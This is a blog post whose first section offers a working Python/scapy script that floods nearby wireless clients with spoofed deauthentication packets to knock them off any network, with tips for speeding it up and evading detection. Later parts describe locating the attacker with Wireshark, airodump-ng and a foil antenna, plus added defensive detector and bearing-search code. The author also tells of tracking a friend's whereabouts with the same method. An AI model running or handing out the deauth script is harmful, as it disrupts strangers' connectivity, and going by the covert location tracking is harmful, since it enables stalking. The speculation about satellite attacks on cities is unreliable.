How to burn down any wireless network around you and how to find out the exact location of a wireless laptop

I made a program which monitors the air for connections between wireless hotspots and hosts; if the program finds a connection, it sends a deauth packet which disconnects the client. This goes at such a high speed that clients have no chance to establish a proper connection to the router.

    #!/usr/bin/python
    try:
        import sys,os
        from scapy.all import *
    except:
        print "[-] Could not import all needed things, be sure you have Python, aircrack-ng and scapy installed"
        sys.exit(0)

    def deauth_flood(p):
        if p.haslayer(Dot11):
            mac = {}
            mac["ap"]=p.sprintf("%Dot11.addr1%")
            mac["station1"]=p.sprintf("%Dot11.addr2%")
            if not mac["ap"]=="ff:ff:ff:ff:ff:ff" and mac["station1"]!="None":
                os.system("aireplay-ng -0 1 -a "+mac["ap"]+" -c "+mac["station1"]+" "+sys.argv[1]+" &") # Remove " &" for a slower attack rate.

    def instructions():
        print "== WLAN blackout - written by Jelmer de Hen - published at http://h.ackack.net ==\n\ninstructions:\n"
        print "python "+sys.argv[0]+" [iface]"
        print "python "+sys.argv[0]+" mon0"

    if len(sys.argv)>1:
        print "[+] Searching for packets..."
        sys.exit(sniff(iface=sys.argv[1],prn=deauth_flood))
    else:
        sys.exit(instructions())

Use at your own risk. You won't be detected too fast, since you send entirely spoofed packets, but with the right equipment and skills on the victim's side he will be able to do it; normally, when these kinds of attacks are launched at companies, they have to ask the ISP to come with a special device which tracks down the exact location of the attacking device. But what when you are the one being targeted by this attack?
First you have to know that this might be hard to detect, since it can be carried out from very different locations. Think about:

- An attacker at one location not too far away, for example in a car
- A moving attacker walking around with a laptop in a bag
- Infected/botted computer(s) of any kind; in this case it could even be your heat pump or light control system
- Malicious pineapples
- Phones (like the iPhone)
- A satellite dish pointed at you
- An infected satellite

Understand that it is impossible to counter some of these attacks, but an iPhone or car should be traceable.

Requirements:

- A movable Linux-based PC with wireless capability; if you don't have a *nix system you can download BackTrack for free, burn it to a DVD and boot from it. In case your PC can't boot DVDs you can go for an Ubuntu live CD or another distribution; booting from these CDs won't change anything on your actual system.
- Wireshark (free)
- Aircrack-ng (free)

Optional:

- pointable antenna
- thin foil
- scissors
- glue
- cardboard (or other hard, bendable material)

Why thin foil, scissors and cardboard? To locate the attacker; it would be ideal to have a parabolic reflector to decrease the time it takes to localize the attacker. You can make the windsurfer or be creative and make something custom. The idea is that you can eliminate one side of the antenna and reflect it to the side you point at, to increase your range and eliminate the chance of the attacker being behind the antenna.

When you have all the requirements you can get started: move into the middle of the deauth packet storm and turn on Wireshark and airodump-ng. In Wireshark apply "radiotap.length==13" as filter (captures all deauth packets) and make a list of all hosts you see in airodump-ng. Look at the rate at which you capture deauth packets, and look in the bottom fields for the connections between routers and hosts; look at the PWR levels there.
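The Wireshark filter above keys on the radiotap header length, which depends on the capture driver and card; a filter on the frame subtype (wlan.fc.type_subtype == 0x0c in Wireshark) matches deauthentication frames regardless of driver. The following is an added example, not code from the original post: it does the same classification programmatically. It parses the fixed 802.11 header of raw frames (the radiotap header is assumed to have been stripped already), picks out deauthentication frames (management type 0, subtype 12) and counts them per spoofed sender and BSSID in a sliding time window, raising one alert when the rate crosses a threshold. The frames, MAC addresses, timestamps and threshold are all constructed for the example. Note that the flagged "sender" is the address being impersonated (the access point), not the attacker's radio; the first three octets of that address are what the manuf lookup later in the post uses, and finding the real transmitter is what the antenna procedure is for.

```python
import struct
from collections import defaultdict, deque


def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))


def mac_str(b):
    return ":".join("%02x" % x for x in b)


def parse_dot11(frame):
    """Parse the fixed 24-byte 802.11 MAC header of a raw frame (no radiotap).

    Returns a dict with frame type/subtype, the three addresses, the sequence
    number and, for deauth frames, the reason code; None if the frame is short.
    """
    if len(frame) < 24:
        return None
    fc0, fc1, duration = struct.unpack_from("<BBH", frame, 0)
    info = {
        "type": (fc0 >> 2) & 0x3,       # 0 = management, 1 = control, 2 = data
        "subtype": (fc0 >> 4) & 0xF,    # 12 = deauthentication (management frames)
        "da": mac_str(frame[4:10]),     # addr1: receiver, the station being kicked
        "sa": mac_str(frame[10:16]),    # addr2: transmitter, spoofed as the AP in a flood
        "bssid": mac_str(frame[16:22]),
        "seq": struct.unpack_from("<H", frame, 22)[0] >> 4,
        "reason": None,
    }
    if info["type"] == 0 and info["subtype"] == 12 and len(frame) >= 26:
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info


def is_deauth(info):
    return info is not None and info["type"] == 0 and info["subtype"] == 12


class DeauthFloodDetector:
    """Sliding-window counter of deauth frames per (sender, BSSID).

    One alert is raised for a key when `threshold` deauth frames are seen
    within `window_ms`; that key then stays quiet until the window has passed.
    """

    def __init__(self, window_ms=1000, threshold=10):
        self.window_ms = window_ms
        self.threshold = threshold
        self.seen = defaultdict(deque)
        self.last_alert = {}
        self.alerts = []

    def observe(self, ts_ms, frame):
        info = parse_dot11(frame)
        if not is_deauth(info):
            return None
        key = (info["sa"], info["bssid"])
        q = self.seen[key]
        q.append(ts_ms)
        while q and ts_ms - q[0] > self.window_ms:   # drop timestamps outside the window
            q.popleft()
        if len(q) < self.threshold:
            return None
        last = self.last_alert.get(key)
        if last is not None and ts_ms - last <= self.window_ms:
            return None                               # already alerted in this window
        self.last_alert[key] = ts_ms
        alert = {"ts_ms": ts_ms, "sender": info["sa"], "oui": info["sa"][:8],
                 "bssid": info["bssid"], "target": info["da"],
                 "count": len(q), "reason": info["reason"]}
        self.alerts.append(alert)
        return alert


# Constructed sample addresses (not real devices).
AP = "00:11:22:aa:bb:cc"
STA = "00:aa:bb:11:22:33"
OTHER_AP = "00:44:55:dd:ee:ff"


def build_deauth(sa, da, bssid, seq, reason=7):
    """Constructed sample deauth frame used only as detector input."""
    hdr = struct.pack("<BBH", 0xC0, 0x00, 0x013A)    # type 0 / subtype 12, duration 314 us
    hdr += mac_bytes(da) + mac_bytes(sa) + mac_bytes(bssid) + struct.pack("<H", seq << 4)
    return hdr + struct.pack("<H", reason)


def build_beacon(bssid, seq):
    """Constructed minimal beacon header, to show non-deauth frames are ignored."""
    hdr = struct.pack("<BBH", 0x80, 0x00, 0x0000)
    return hdr + mac_bytes("ff:ff:ff:ff:ff:ff") + mac_bytes(bssid) + mac_bytes(bssid) + struct.pack("<H", seq << 4)


def run_demo():
    """Feed one beacon, one legitimate deauth and a 25-frame flood; return the alerts."""
    det = DeauthFloodDetector(window_ms=1000, threshold=10)
    frames = [(0, build_beacon(AP, 1)),
              (5, build_deauth(OTHER_AP, STA, OTHER_AP, 9, reason=3))]  # single, normal deauth
    frames += [(20 * i, build_deauth(AP, STA, AP, 100 + i)) for i in range(25)]  # one every 20 ms
    frames.sort(key=lambda x: x[0])
    alerts = []
    for ts, frame in frames:
        a = det.observe(ts, frame)
        if a:
            alerts.append(a)
    return alerts


if __name__ == "__main__":
    for a in run_demo():
        print("deauth flood: %(count)d frames from %(sender)s (OUI %(oui)s) against %(target)s, reason %(reason)s" % a)
```

The single legitimate deauth from the other BSSID never reaches the threshold and produces nothing, while the spoofed stream trips the detector on the tenth frame; the same counting logic can be run over a pcap by stripping the radiotap header before calling observe().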
Now turn the windsurfer 90 degrees and look at the rate at which you capture deauth packets now; decide whether it is less or more, and repeat this process until you find the direction from which the deauth packets arrive at the highest rate. When you are in a building it would be smart to also look below and above you. Once you have localized the direction the most deauth packets come from, move your PC closer to that source, then redo the process of monitoring where the packets come from and look at aircrack-ng. Once you are very, very close you can determine which MAC address is doing this by looking it up in airodump-ng; at that moment this machine will have a very low PWR (0 to -50 is good enough).

Now run this command in bash to determine the manufacturer of the card, so you know something more about the attacking machine:

    cat `locate manuf` | grep 00:11:22

Replace the last part with the first part of the MAC address; for example, when you found the MAC address 55:44:33:22:11:00 then 55:44:33 is the part you need. Please note that this MAC address can be spoofed and/or not broadcasting, so you won't be able to see it; then you have to do it all with Wireshark and determine where the most packets come from. After you have done all this you can just grab that malicious pineapple and smash it as hard as you can.

This cheap attack vector can form a high risk level during war: when properly exploited, an army can attack an entire city by pointing a satellite dish in its direction, or think about an attacker who takes over a satellite and reprograms it to be able to do these kinds of attacks. With these techniques it will be hard to prevent those attacks unless we make big thin foil shields around our cities.
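The turn-and-compare search above can be written down as a coarse-to-fine sweep. This is an added example, not from the original post: it simulates a directional antenna whose deauth capture rate falls off with the angle between the antenna and the source, sweeps the full circle in 90 degree steps, keeps the bearing with the highest rate, then halves the step and re-measures one step either side of the best bearing until the step is below 5 degrees. The antenna pattern, the peak rate of 200 frames per interval and the true bearing of 235 degrees are assumptions made up for the simulation; in practice measure() would be replaced by counting the deauth frames Wireshark captures in a fixed interval with the windsurfer pointed at each bearing.

```python
import math


def angle_diff(a, b):
    """Smallest signed difference between two bearings in degrees, in (-180, 180]."""
    return ((a - b + 180.0) % 360.0) - 180.0


def make_simulated_measure(true_bearing, peak_rate):
    """Return a measure(bearing) function for an idealised directional antenna.

    Simulation assumption: the captured deauth rate scales with ((1 + cos d) / 2) ** 2,
    where d is the angle between the antenna and the source, so the rate peaks when
    the antenna points straight at the source and is near zero when it points away.
    """
    def measure(bearing):
        d = math.radians(angle_diff(bearing, true_bearing))
        gain = ((1.0 + math.cos(d)) / 2.0) ** 2
        return int(round(peak_rate * gain))   # whole frames counted per interval
    return measure


def estimate_bearing(measure, step=90.0, min_step=5.0):
    """Coarse-to-fine search for the bearing with the highest deauth rate.

    Sample the whole circle every `step` degrees, keep the best bearing, then
    repeatedly halve the step and measure one step either side of the current
    best, stopping once the step drops below `min_step`.
    Returns (bearing_deg, rate_at_bearing, number_of_measurements_taken).
    """
    bearings = [i * step for i in range(int(360.0 / step))]
    samples = {b: measure(b) for b in bearings}        # cache: each bearing measured once
    best = max(bearings, key=lambda b: samples[b])
    step /= 2.0
    while step >= min_step:
        candidates = [(best - step) % 360.0, best, (best + step) % 360.0]
        for c in candidates:
            if c not in samples:
                samples[c] = measure(c)
        best = max(candidates, key=lambda b: samples[b])
        step /= 2.0
    return best, samples[best], len(samples)


def run_demo():
    """Locate a simulated source at 235 degrees; constructed scenario."""
    measure = make_simulated_measure(true_bearing=235.0, peak_rate=200)
    return estimate_bearing(measure)


if __name__ == "__main__":
    bearing, rate, n = run_demo()
    print("strongest deauth rate %d frames/interval at %.2f degrees after %d measurements" % (rate, bearing, n))
```

Twelve measurements bring the estimate within a few degrees of the source, against 72 for a blind 5 degree sweep; with a noisy real capture rate, average several intervals per bearing before comparing, and repeat the whole search from the new position after moving closer, as the post describes.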
I gave you some basic solutions to find the attacker, but this antenna detection method also works great for other purposes. I once tried this on a friend of mine in my old school to find out his location; it was a multi-floor school building and I had no idea where he was, but within 15 minutes I found him.